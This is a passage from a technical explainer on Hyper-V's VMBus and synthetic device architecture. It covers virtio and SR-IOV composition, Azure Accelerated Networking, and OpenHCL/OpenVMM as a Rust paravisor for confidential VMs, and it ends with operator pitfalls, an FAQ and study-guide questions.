&lt;p&gt;VMBus&apos;s strongest claim is &lt;strong&gt;integration&lt;/strong&gt;. Every supported Windows ships with the VSCs in-box; there is nothing for an admin to install. The transport carries not just I/O but a service catalogue: KVP for guest configuration, time sync, VSS for online backup, the heartbeat and shutdown channels. The TLFS, while owned by Microsoft, is published under the Open Specification Promise and is a &lt;em&gt;single&lt;/em&gt; document a guest author can read end-to-end.This is why &quot;VirtIO drivers for Windows&quot; exist as a separate project (the Fedora/Red Hat-signed &lt;code&gt;virtio-win&lt;/code&gt; package) for KVM clouds: out of the box, Windows does not know virtio. The Hyper-V world inverts the problem: out of the box, Linux does not need any third-party install because the drivers are upstream.&lt;/p&gt;
&lt;h3&gt;Where they coexist&lt;/h3&gt;
&lt;p&gt;The most interesting recent development is that the two camps have stopped being purely competitive. Microsoft&apos;s OpenVMM [@github-openvmm] implements both VMBus and virtio backends, so a Linux guest using virtio drivers can run on a Microsoft-developed VMM, and a Windows guest using VMBus drivers can run on the same VMM. This is partially ideological (Microsoft is no longer pretending its way is the only way) and partially pragmatic (a single VMM that supports both transports is simpler than maintaining two).&lt;/p&gt;
&lt;p&gt;Beyond the protocol-level comparison, both VMBus and virtio sit inside a larger composition with hardware passthrough, where the &lt;strong&gt;transport becomes the slow path&lt;/strong&gt; and a real PCIe device carries the steady-state traffic.&lt;/p&gt;
&lt;h3&gt;Hardware passthrough as a complement&lt;/h3&gt;
&lt;p&gt;The composition that runs almost every modern Azure VM is &lt;strong&gt;VMBus + SR-IOV&lt;/strong&gt;, packaged as Accelerated Networking [@ms-accelerated-networking]. The same VM gets both a synthetic NIC (&lt;code&gt;netvsc&lt;/code&gt; over VMBus) and an SR-IOV virtual function. The Linux netvsc driver documentation describes the failover mechanic: &quot;If SR-IOV is enabled in both the vSwitch and the guest configuration, then the Virtual Function (VF) device is passed to the guest as a PCI device. In this case, both a synthetic (netvsc) and VF device are visible in the guest OS and both NIC&apos;s have the same MAC address. The VF is enslaved by netvsc device. The netvsc driver will transparently switch the data path to the VF when it is available and up.&quot; (Linux kernel: netvsc [@kernel-netvsc]).&lt;/p&gt;
&lt;p&gt;When live migration starts, Azure revokes the VF, the data plane falls back to the netvsc/VMBus path, the VM moves, and a new VF on the destination host gets re-attached, all without dropping TCP connections. The VMBus path was never the production hot path, but its existence is what enables migration. The KVM world&apos;s analogue is &lt;strong&gt;vDPA&lt;/strong&gt;, which gives a virtio-shaped guest interface backed by a hardware data plane.&lt;/p&gt;
&lt;p&gt;A modern Azure NIC stack is pushing this even further. Azure Boost [@ms-azure-boost] moves both storage and networking data planes off the host CPU into dedicated FPGAs, with a stable Microsoft-engineered NIC interface called MANA [@ms-mana]. Microsoft&apos;s documentation reports up to 200 Gbps of network bandwidth and 6.6 million IOPS on local storage with this design, with the host&apos;s vmswitch still acting as the live-migration fallback path. The architectural insight is that the VMBus-based slow path is the durable invariant; what changes is whether the steady-state data plane is software, an SR-IOV VF, or a SmartNIC firmware path. Frameworks like DPDK [@dpdk-about] sit on top of whichever data plane the VM exposes.&lt;/p&gt;
&lt;p&gt;What none of this changes is the property Section 7 cared about: as long as a host-side VSP exists and parses guest-controlled bytes in kernel C/C++, the bug class is open. The next section is about the architectural move that closes it.&lt;/p&gt;
&lt;h2&gt;9. OpenVMM and OpenHCL: the 2024 open-source pivot&lt;/h2&gt;
&lt;p&gt;In 2024, Microsoft did two things that would have been hard to imagine a decade earlier. First, they open-sourced OpenVMM [@github-openvmm], a Rust implementation of the virtualization stack including the VSPs and the VMBus protocol. Second, they introduced OpenHCL [@ms-openhcl-deep-explainer], a &quot;paravisor&quot; configuration of OpenVMM that runs &lt;em&gt;inside&lt;/em&gt; a confidential VM as a higher-trust mediator between the workload and the (now-untrusted) host.&lt;/p&gt;
&lt;p&gt;Both moves are explained by the same trend the article has been circling: confidential computing fundamentally inverts the trust boundary, and the device model has to follow.&lt;/p&gt;

A higher-privileged software layer that runs *inside* a guest VM (not on the host) and mediates the guest&apos;s interaction with the hypervisor. In the Hyper-V model, a paravisor lives in VTL2 of the same VM whose workload runs in VTL0; the host hypervisor is outside the VM&apos;s trust boundary. The paravisor presents the workload with a familiar VMBus + VSP interface while internally talking to a hardware-isolated confidential VM substrate (AMD SEV-SNP or Intel TDX).
&lt;h3&gt;What changed in confidential computing&lt;/h3&gt;
&lt;p&gt;The classical Hyper-V trust model places the root partition at the apex of trust. The guest trusts the host. Memory the guest writes is, in the worst case, readable by the host. In &lt;strong&gt;confidential computing&lt;/strong&gt;, that is no longer acceptable. A regulated workload (a healthcare database, a financial processor) needs to run in a VM whose contents are protected even from a malicious or compromised hypervisor. AMD&apos;s &lt;strong&gt;SEV-SNP&lt;/strong&gt; and Intel&apos;s &lt;strong&gt;TDX&lt;/strong&gt; are CPU features that encrypt and integrity-protect VM memory in hardware so that a compromised host cannot read the guest&apos;s secrets.&lt;/p&gt;
&lt;p&gt;Azure Confidential Computing [@ms-confidential-computing] made these capabilities available as a product starting around 2022. The Azure confidential VM options page [@ms-coco-vm-options] documents the SKUs.&lt;/p&gt;
&lt;p&gt;This breaks the old VMBus story. In the classical model, the host&apos;s &lt;code&gt;vmswitch.sys&lt;/code&gt; reads the guest&apos;s network packets out of the VMBus ring. In a confidential VM that protection demands you can no longer let the host see those bytes; that defeats the entire point. So the question becomes: where does the synthetic-device backend live, if not in the host?&lt;/p&gt;
&lt;h3&gt;The paravisor answer&lt;/h3&gt;
&lt;p&gt;The Linux kernel&apos;s Hyper-V CoCo VMs document [@kernel-coco] describes the design directly: &quot;Paravisor mode. In this mode, a paravisor layer between the guest and the host provides some operations needed to run as a CoCo VM. The guest operating system can have fewer CoCo enlightenments than is required in the fully-enlightened case ... some aspects of CoCo VMs are handled by the Hyper-V paravisor while the guest OS must be enlightened for other aspects.&quot;&lt;/p&gt;
&lt;p&gt;OpenHCL is that paravisor. It runs in a higher-trust virtual trust level inside the same confidential VM (VTL2), it has access to the encrypted-memory primitives the CPU provides, and it presents the workload (in VTL0) with the same VMBus + VSP world a non-confidential VM would see. The workload OS does not need to be heavily modified; it sees what looks like Hyper-V, talks to what look like normal VSPs, and never has to know that those VSPs are now inside its own VM rather than on the host.&lt;/p&gt;

flowchart TD
    HW[&quot;Confidential CPU (SEV-SNP / TDX)&quot;]
    HV[&quot;Host hypervisor (untrusted by the workload)&quot;]
    subgraph CoCoVM[&quot;Confidential VM (memory encrypted)&quot;]
        VTL2[&quot;VTL2: OpenHCL paravisor (Rust VSPs)&quot;]
        VTL0[&quot;VTL0: workload OS (Windows or Linux, lightly enlightened)&quot;]
        VTL0 -- &quot;VMBus, looks normal&quot; --- VTL2
    end
    HW --&amp;gt; HV
    HV --&amp;gt; CoCoVM
    HV -. &quot;no access to guest plaintext&quot; .-&amp;gt; CoCoVM
&lt;h3&gt;The Rust rewrite&lt;/h3&gt;
&lt;p&gt;The other half of the story is &lt;strong&gt;memory safety&lt;/strong&gt;. Recall Section 7&apos;s CVE list: every headline Hyper-V escape in the past decade involved a parser bug in C/C++ kernel code. OpenVMM&apos;s choice to implement the entire VMM, including the VSPs, in Rust is a direct response to that history. Rust&apos;s ownership model rules out, by construction, a large class of memory-safety bugs (use-after-free, out-of-bounds access on slices, double-free) that produced those CVEs.&lt;/p&gt;
&lt;p&gt;This does not magically eliminate every vulnerability. A logic bug in a state machine, an integer-overflow on a length field, a side-channel timing leak: all of these still exist in Rust. But the categories that produced CVE-2017-0075, CVE-2021-28476, and CVE-2024-21407 are exactly the categories Rust was designed to make hard.&lt;/p&gt;

Garbage-collected languages are wrong for a kernel-mode parser: GC pauses are unacceptable in a hypervisor-adjacent fast path, and you cannot afford a runtime that allocates memory during interrupt handling. Rust&apos;s compile-time memory safety with no GC is, today, the only mature option that gives you both the safety and the predictability a VSP needs. Microsoft&apos;s choice is consistent with the rest of the industry; comparable rewrites of low-level systems infrastructure (Cloudflare&apos;s `cf-cmd`, Mozilla&apos;s `quiche`, the Android Bluetooth stack) have all converged on Rust.
&lt;h3&gt;What you can actually look at&lt;/h3&gt;
&lt;p&gt;OpenVMM is not a press release; it is a public repository that ships:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The full Rust source tree at github.com/microsoft/openvmm [@github-openvmm].&lt;/li&gt;
&lt;li&gt;A separate repository for the Linux kernel fork that the paravisor runs on top of, at github.com/microsoft/OHCL-Linux-Kernel [@github-ohcl-linux].&lt;/li&gt;
&lt;li&gt;Project documentation centred at openvmm.dev [@openvmm-dev].&lt;/li&gt;
&lt;li&gt;Both VMBus and virtio backends, so the same VMM can host Windows guests on VMBus and Linux guests on virtio.&lt;/li&gt;
&lt;li&gt;Documentation through the deeper Microsoft Tech Community explainer [@ms-openhcl-deep-explainer] and the original announcement [@ms-openhcl-announce] describing the paravisor&apos;s role.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a security researcher or a regulated-cloud customer, this is a meaningful change. For the first time, the VMBus + VSP stack is auditable end-to-end in source.&lt;/p&gt;

If you want to see how a VSP actually consumes a channel, the OpenVMM repository contains the Rust modules that implement the VMBus channel state machine. Cloning the repo and grepping for `Channel::open` and `RingBuffer` shows the same offer/open/close/rescind pattern Section 3 described, expressed in Rust types whose lifetimes the compiler checks. Reading the same logic in Rust after reading the Linux C version in `drivers/hv/channel_mgmt.c` is a useful exercise; the abstraction is identical, and the safety guarantees diverge.
&lt;h3&gt;What still has to be solved&lt;/h3&gt;
&lt;p&gt;The kernel CoCo doc is candid about an open architectural problem that OpenHCL alone cannot solve: &quot;Unfortunately, there is no standardized enumeration of feature/functions that might be provided in the paravisor, and there is no standardized mechanism for a guest OS to query the paravisor for the feature/functions it provides. The understanding of what the paravisor provides is hard-coded in the guest OS.&quot; (Linux kernel: CoCo VMs [@kernel-coco]).&lt;/p&gt;
&lt;p&gt;In other words, the TLFS gave us a portable contract between guests and Hyper-V hypervisors. The paravisor world does not yet have an equivalent portable contract between guests and paravisors. Today&apos;s guests have OpenHCL-specific knowledge baked in. A future &quot;paravisor TLFS&quot; would let any compliant paravisor host any compliant guest, the same way the original TLFS did for the hypervisor. That standard does not exist yet, and writing it is the most consequential open problem in this corner of the architecture.&lt;/p&gt;
&lt;p&gt;The architecture is moving. Section 10 takes stock of what that means for engineers building or operating on this stack today.&lt;/p&gt;
&lt;h2&gt;10. Engineering takeaways and open problems&lt;/h2&gt;
&lt;p&gt;A working architecture is one where the trade-offs are &lt;em&gt;visible&lt;/em&gt;. Hyper-V&apos;s enlightenments + VMBus + VSP/VSC stack is a working architecture in exactly that sense: every property it has, including the security ones, is a consequence of design choices a reader can name.&lt;/p&gt;
&lt;h3&gt;What the design optimises for&lt;/h3&gt;
&lt;p&gt;Three explicit optimisations:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;In-box drivers for closed-source guests.&lt;/strong&gt; Hardware virtualization handles privileged CPU instructions; the guest only needs to load a VMBus client driver to opt in to the fast path. Every supported Windows ships those drivers in-box. Every modern Linux ships them in-tree. There is no &quot;install paravirt drivers&quot; step, which is a large reason &quot;it just works.&quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A single transport that carries everything.&lt;/strong&gt; VMBus carries 12+ device classes plus non-device services (KVP, time sync, VSS, balloon, heartbeat). One protocol, one set of primitives, one debugging surface. This is the engineering equivalent of &quot;everything is a file&quot; applied to inter-partition communication.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live migration.&lt;/strong&gt; Because the data plane is software in the root partition, the VM is not bound to a specific host. The VSPs serialise their state during migration without guest cooperation. This is the property that makes VMBus the durable invariant under hardware-passthrough acceleration: SR-IOV gives you throughput; VMBus gives you mobility.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;What it pays for those properties&lt;/h3&gt;
&lt;p&gt;Two costs:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The host CPU is on the data plane.&lt;/strong&gt; A software ring serviced by &lt;code&gt;vmswitch.sys&lt;/code&gt; cannot match a 100 GbE NIC&apos;s line rate per host CPU core. Microsoft&apos;s answer is hybrid composition with SR-IOV (Accelerated Networking [@ms-accelerated-networking]) and SmartNIC offload (Azure Boost + MANA [@ms-azure-boost]). The KVM analogue is vDPA [@redhat-vdpa]. Both of these accept the structural truth that for the highest throughputs, the host CPU has to leave the data plane.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The host kernel parses guest-controlled bytes.&lt;/strong&gt; Section 7&apos;s CVE record is the catalogue of what that costs. The architectural answer is OpenHCL: move the parser into the guest&apos;s own trust boundary and rewrite it in Rust.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;A four-property idealisation&lt;/h3&gt;
&lt;p&gt;It is useful to write down what an idealised paravirt I/O stack would do, so it is clear which properties any real stack today is trading away.&lt;/p&gt;
&lt;p&gt;The four idealised properties:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Zero hypercalls per packet&lt;/strong&gt; in steady state.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live-migration parity&lt;/strong&gt; with a software baseline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cross-vendor / cross-hypervisor portability&lt;/strong&gt; of the guest driver.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No host-side memory-unsafe parser&lt;/strong&gt; of guest-controlled data.&lt;/li&gt;
&lt;/ol&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;(1) Zero hypercall&lt;/th&gt;
&lt;th&gt;(2) Live migration&lt;/th&gt;
&lt;th&gt;(3) Portability&lt;/th&gt;
&lt;th&gt;(4) No unsafe host parser&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;VMBus + in-kernel VSP&lt;/td&gt;
&lt;td&gt;partial (batched)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;virtio + vhost-net&lt;/td&gt;
&lt;td&gt;partial (batched)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SR-IOV / DDA&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accelerated Networking (VMBus + SR-IOV)&lt;/td&gt;
&lt;td&gt;yes (steady)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vDPA&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenHCL paravisor + VMBus&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure Boost + MANA&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;partial&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;No single approach today matches all four properties. The Hyper-V production composition is roughly &lt;strong&gt;(VMBus baseline) + (Accelerated Networking for throughput) + (OpenHCL for confidential workloads)&lt;/strong&gt;. The KVM-world composition is &lt;strong&gt;(virtio baseline) + (vDPA / SmartNIC for throughput)&lt;/strong&gt;. SmartNIC-based stacks (Azure Boost, AWS Nitro, Google&apos;s offload) approach the same four-corner problem from yet another angle.&lt;/p&gt;
&lt;p&gt;This is a synthesis, not a single-source claim: the matrix combines properties documented separately in the Microsoft Accelerated Networking docs [@ms-accelerated-networking], the Linux kernel CoCo doc [@kernel-coco], the Discrete Device Assignment doc [@ms-dda], the SR-IOV overview [@ms-sriov-overview], the Linux netvsc driver doc [@kernel-netvsc], the VDUSE userspace interface [@kernel-vduse], the vPCI doc [@kernel-vpci], and the OpenHCL explainer [@ms-openhcl-deep-explainer]. Each individual cell is sourced; the ranking is the author&apos;s reading of those sources.&lt;/p&gt;
&lt;h3&gt;Practical pitfalls for operators&lt;/h3&gt;
&lt;p&gt;A few things the customer-facing docs do not always say plainly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;vmbusrhid&lt;/code&gt; is not low-risk.&lt;/strong&gt; The keyboard/mouse channel is a kernel-level RPC surface from guest to root. Treat it the same way you would treat netvsc when modelling threat exposure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation-2 VMs reduce attack surface.&lt;/strong&gt; Choosing Generation-2 for new workloads removes the legacy IDE/PS/2/PIC emulators from the host data path entirely (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mixing in-box and out-of-band Integration Services breaks things.&lt;/strong&gt; Modern Windows and modern Linux already have the drivers; installing the legacy LIS package on top can break MSI-X handling and PCI passthrough (Linux kernel: overview [@kernel-hyperv-overview]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DDA is not SR-IOV.&lt;/strong&gt; Discrete Device Assignment covers any PCIe device passthrough, but Microsoft formally supports only &lt;strong&gt;GPUs and NVMe&lt;/strong&gt; as device classes (Microsoft Learn: DDA planning [@ms-dda]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Confidential VMs do not have the same device set.&lt;/strong&gt; Hardware constraints reduce or alter the device classes available; always validate the specific synthetic devices your workload depends on are present in the target SKU (Linux kernel: CoCo [@kernel-coco]).&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. Confidential VM (SEV-SNP / TDX)? Use the OpenHCL paravisor mode (Azure CoCo VM options [@ms-coco-vm-options]). 2. Need ≥40 Gbps with live migration? Use Accelerated Networking; on Boost-enabled SKUs, Boost adds another tier of offload. 3. Need ≥100 Gbps and accept binding to host? Use Discrete Device Assignment / SR-IOV. 4. Maximum guest portability across hypervisors? Use virtio; for bandwidth-sensitive workloads, vDPA. 5. Default Hyper-V workload, broad device coverage, native migration? VMBus + VSP (the default).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Open problems worth watching&lt;/h3&gt;
&lt;p&gt;The substantive open problems are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;A standardised paravisor feature-enumeration interface.&lt;/strong&gt; OpenHCL is the first auditable paravisor, but there is no portable contract a guest can use to query &quot;what does this paravisor support.&quot; The TLFS gave us this for hypervisors; the paravisor analogue is missing (Linux kernel: CoCo [@kernel-coco]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Confidential-VM-friendly live migration with paravirt devices.&lt;/strong&gt; Hardware-attested state cannot be cloned trivially; today&apos;s pragmatic answer is to constrain migration in CoCo VMs. A general solution is open.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A formal model of the VMBus offer/rescind state machine.&lt;/strong&gt; The kernel docs describe it narratively. A model that the VSP code could be checked against would let static analysis rule out the bug class behind the headline CVEs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live-migrating stateful SR-IOV VFs without device cooperation.&lt;/strong&gt; Vendor proposals exist; an industry standard does not.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Erasing memory-unsafety in legacy VSPs.&lt;/strong&gt; The Rust rewrite path in OpenVMM is correct; the multi-year engineering effort to convert every existing VSP is real. CVE-2024-21407 is recent enough to remind everyone the bug class is still producing fresh entries.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;What to remember in five years&lt;/h3&gt;
&lt;p&gt;The most important sentence in this article is one I have been quietly preparing throughout: the durable architectural invariant in Hyper-V is &lt;strong&gt;shared-memory ring + doorbell, with a published guest-side contract&lt;/strong&gt;. Everything else, including the choice of programming language for the VSP, the question of whether the data plane is software or hardware, and even whether the trust boundary places the VSP on the host or in a paravisor, is implementation. The transport is the invariant. That is the lesson the next decade of CoCo VMs and SmartNIC offload is converging toward: keep the contract stable, and let everything else change.&lt;/p&gt;
&lt;h2&gt;FAQ&lt;/h2&gt;

No. The drivers (`hv_vmbus`, `hv_netvsc`, `hv_storvsc`, `hv_utils`, `pci-hyperv`, `hv_balloon`) have been in the upstream Linux kernel since 2.6.32 in December 2009 and ship in every mainstream distribution. The legacy LIS package is a holdover from the era before in-tree support and can in fact break MSI-X handling and PCI passthrough if installed on top of a modern kernel (Linux kernel: Hyper-V overview [@kernel-hyperv-overview]).

Because the trust gradient is asymmetric. The VSP runs in the root partition&apos;s kernel, the most privileged context on the box; the VSC runs in a normal guest kernel. Bytes flowing from guest to host get parsed by code with full system privilege. A VSC bug typically harms only the guest; a VSP bug can be a cross-tenant compromise. The pattern is visible in the CVE record: CVE-2017-0075 [@nvd-cve-2017-0075], CVE-2021-28476 [@nvd-cve-2021-28476], and CVE-2024-21407 [@nvd-cve-2024-21407] all hit host-side parsers.

For live migration. SR-IOV gives you near-bare-metal throughput but binds the VM to a specific physical NIC; you cannot migrate that state. Keeping a VMBus-backed `netvsc` device in the same guest gives the hypervisor a software path it can fall back to during migration windows. The Linux kernel netvsc doc describes this failover explicitly: when SR-IOV is enabled, the VF is enslaved by netvsc and the data path switches transparently when the VF is up (Linux kernel: netvsc [@kernel-netvsc]).

OpenHCL is a *configuration* of OpenVMM, not a separate codebase. OpenVMM is the Rust virtualization stack at github.com/microsoft/openvmm [@github-openvmm]; OpenHCL is OpenVMM run as a paravisor inside a confidential VM&apos;s higher-trust virtual trust level (VTL2), so that the synthetic-device backends sit inside the guest&apos;s own trust boundary rather than on a host the guest cannot trust. The same Rust code can run as a host-side VMM (when paired with a hypervisor on the host) or as an in-guest paravisor (when running inside a SEV-SNP or TDX VM).

Both directions exist with caveats. OpenVMM, when used as a host VMM, supports both VMBus and virtio backends, so a Linux virtio guest can run on a Microsoft-developed VMM (github.com/microsoft/openvmm [@github-openvmm]). Native Hyper-V on a Windows Server host historically expects VMBus-driven guests; there is no in-box virtio device emulation on a stock Hyper-V Server. KVM hosts can technically present a VMBus-shaped device, but in practice the production answer on KVM is virtio.

Generation-2 VMs use UEFI with Secure Boot, boot from synthetic SCSI, and have no emulated IDE, PS/2, or PIC in the data path (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]). Every emulator that is removed is one fewer parser running in the most privileged kernel on the host, so the host-side attack surface is meaningfully smaller. Generation-1 still exists for legacy guests that only know how to boot from BIOS + IDE.

VBS uses the Hyper-V hypervisor to split a single Windows install into VTL0 (the normal kernel and apps) and VTL1 (the Secure Kernel and trustlets like `lsaiso.exe`). The hypervisor enforces that VTL0 cannot read or modify VTL1&apos;s memory, even with kernel privileges. So an attacker who already has SYSTEM-level code execution in the normal world cannot trivially extract LSASS secrets or load arbitrary unsigned kernel code; the hypervisor stops them. This works on any modern Windows machine with the right CPU features, regardless of whether you ever run a VM yourself (Microsoft Learn: Windows Server 2016 What&apos;s New [@ms-server-2016]).
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;hyper-v-enlightenments-vmbus-and-the-synthetic-device-model&quot; keyTerms={[
  { term: &quot;Type-1 hypervisor&quot;, definition: &quot;A hypervisor that runs directly on hardware rather than inside a host OS. Hyper-V is Type-1; the original Microsoft Virtual Server was Type-2.&quot; },
  { term: &quot;Root partition&quot;, definition: &quot;The privileged partition under Hyper-V that owns physical I/O devices and hosts the synthetic-device VSPs. Runs Windows Server.&quot; },
  { term: &quot;Child partition&quot;, definition: &quot;An unprivileged partition that hosts a guest OS. Communicates with the root partition over VMBus.&quot; },
  { term: &quot;Enlightenment&quot;, definition: &quot;A guest-OS modification or feature that takes advantage of running under a specific hypervisor by using paravirtual interfaces (hypercalls, synthetic timers, SINTs) instead of trapping on emulated hardware.&quot; },
  { term: &quot;Top-Level Functional Specification (TLFS)&quot;, definition: &quot;Microsoft&apos;s published hypervisor ABI for Hyper-V, governing hypercalls, synthetic MSRs, synthetic interrupts, synthetic timers, and the VMBus protocol. Released under the Open Specification Promise.&quot; },
  { term: &quot;VMBus&quot;, definition: &quot;Hyper-V&apos;s software-only inter-partition transport. Has a control path (channel offer/open/close/rescind) and per-device shared-memory ring channels with SINT-based doorbells.&quot; },
  { term: &quot;VSP / VSC&quot;, definition: &quot;Virtualization Service Provider (root-partition kernel module that owns a synthetic-device backend) and Virtualization Service Client (guest-side driver that consumes the channel).&quot; },
  { term: &quot;Synthetic Interrupt Controller (SynIC)&quot;, definition: &quot;Per-vCPU synthetic interrupt subsystem with 16 SINT slots and shared message/event pages; the doorbell mechanism for VMBus and synthetic timers.&quot; },
  { term: &quot;Reference TSC page&quot;, definition: &quot;A guest-readable page maintained by Hyper-V containing scale and offset such that the guest can compute a 10 MHz monotonic clock from the hardware TSC entirely in user space.&quot; },
  { term: &quot;Generation-2 VM&quot;, definition: &quot;A Hyper-V VM that boots UEFI with Secure Boot from synthetic SCSI, with no emulated IDE/PS/2/PIC. Reduces host-side attack surface and supports VHDX up to 64 TB.&quot; },
  { term: &quot;Discrete Device Assignment (DDA)&quot;, definition: &quot;Hyper-V&apos;s general PCIe-passthrough mechanism. Microsoft formally supports GPUs and NVMe; other devices may work with vendor support.&quot; },
  { term: &quot;Accelerated Networking&quot;, definition: &quot;An Azure/Hyper-V feature that attaches both a synthetic NIC (netvsc over VMBus) and an SR-IOV virtual function to a guest, with netvsc as the live-migration fallback path.&quot; },
  { term: &quot;VBS / HVCI / VTL&quot;, definition: &quot;Virtualization-Based Security uses the Hyper-V hypervisor to split a single guest into Virtual Trust Levels (VTL0 normal, VTL1 secure). HVCI (Hypervisor-protected Code Integrity) and trustlets like lsaiso.exe live in VTL1.&quot; },
  { term: &quot;Paravisor&quot;, definition: &quot;A higher-trust software layer running inside a confidential VM (typically in VTL2) that mediates between the workload and the untrusted host hypervisor; presents the workload with a familiar VMBus + VSP world.&quot; },
  { term: &quot;OpenVMM / OpenHCL&quot;, definition: &quot;Microsoft&apos;s 2024 open-source Rust virtualization stack and its paravisor configuration. Re-implements the VSPs in memory-safe Rust to address the bug class behind CVE-2017-0075, CVE-2021-28476, and CVE-2024-21407.&quot; }
]} questions={[
  { q: &quot;Why does Microsoft maintain the Top-Level Functional Specification under the Open Specification Promise rather than as an internal document?&quot;, a: &quot;Because the OSP is what makes it legally and practically safe for the Linux community to ship in-tree drivers (drivers/hv/) implementing the hypervisor&apos;s guest-side ABI. Without the published, OSP-protected spec, Linux could only support Hyper-V via reverse-engineering, which would not have been politically or technically acceptable upstream. The OSP is the contractual artefact that turned &apos;Hyper-V can host Linux&apos; from a vendor claim into a maintained, in-tree reality.&quot; },
  { q: &quot;Walk through the lifecycle of a single network packet from a Hyper-V guest&apos;s userspace to the wire.&quot;, a: &quot;(1) The guest application calls send(); (2) the guest TCP/IP stack hands a packet to the hv_netvsc driver; (3) hv_netvsc allocates a slot in the netvsc TX VMBus ring, copies the descriptor and payload, and writes the new write index; (4) if the host is not already chasing the writes, the guest issues a HV_SIGNAL_EVENT hypercall (one VMEXIT) to fire the SINT for that channel; (5) the host&apos;s vmswitch.sys VSP reaps the descriptor from the ring, parses the RNDIS frame, and forwards it to the virtual switch; (6) the virtual switch dispatches it to a real NIC. In the steady state, a single VMEXIT can amortise across many packets through batching.&quot; },
  { q: &quot;Explain why the host-side VSP is the historical CVE locus for Hyper-V escapes.&quot;, a: &quot;Because the VSP runs in the root partition&apos;s kernel (the most privileged context on the box) and parses guest-controlled bytes from the VMBus ring. Any memory-safety mistake (length confusion, missing bounds check, integer overflow) in C/C++ kernel code translates directly to code execution in the most privileged supervisor on the host. CVE-2017-0075, CVE-2021-28476 (vmswitch.sys), and CVE-2024-21407 all instantiate this pattern. The attack surface is structural, not incidental.&quot; },
  { q: &quot;What does an enlightened Linux guest do when it first boots on Hyper-V, before any network or storage I/O happens?&quot;, a: &quot;It executes cpuid leaf 0x40000000 to detect the Microsoft hypervisor signature; reads further leaves to enumerate available enlightenments; writes HV_X64_MSR_GUEST_OS_ID to declare itself; writes HV_X64_MSR_HYPERCALL with a guest-physical address and an enable bit, prompting the hypervisor to populate that page with the right vmcall/vmmcall opcode; sets up SINT slots and a per-CPU SynIC message page; optionally reads the reference TSC page; loads the hv_vmbus driver, which begins receiving channel offers from the root partition; and binds class-specific drivers (hv_netvsc, hv_storvsc, etc.) to each offered channel.&quot; },
  { q: &quot;Why is OpenHCL described as a paravisor rather than a hypervisor or a VMM?&quot;, a: &quot;Because it sits inside a guest VM (in VTL2 of that VM), not on the host, and its job is to mediate between the guest workload and a hypervisor that the guest does not trust. A hypervisor on the host runs underneath all VMs; a VMM owns and controls VMs from outside; a paravisor lives inside one VM, at higher privilege than that VM&apos;s workload, and presents the workload with a familiar device-model surface (VMBus + VSPs) that is now backed by code inside the guest&apos;s own trust boundary rather than by the host kernel. The architecture inverts the historical Hyper-V trust model so that confidential VMs can be protected from a malicious host.&quot; },
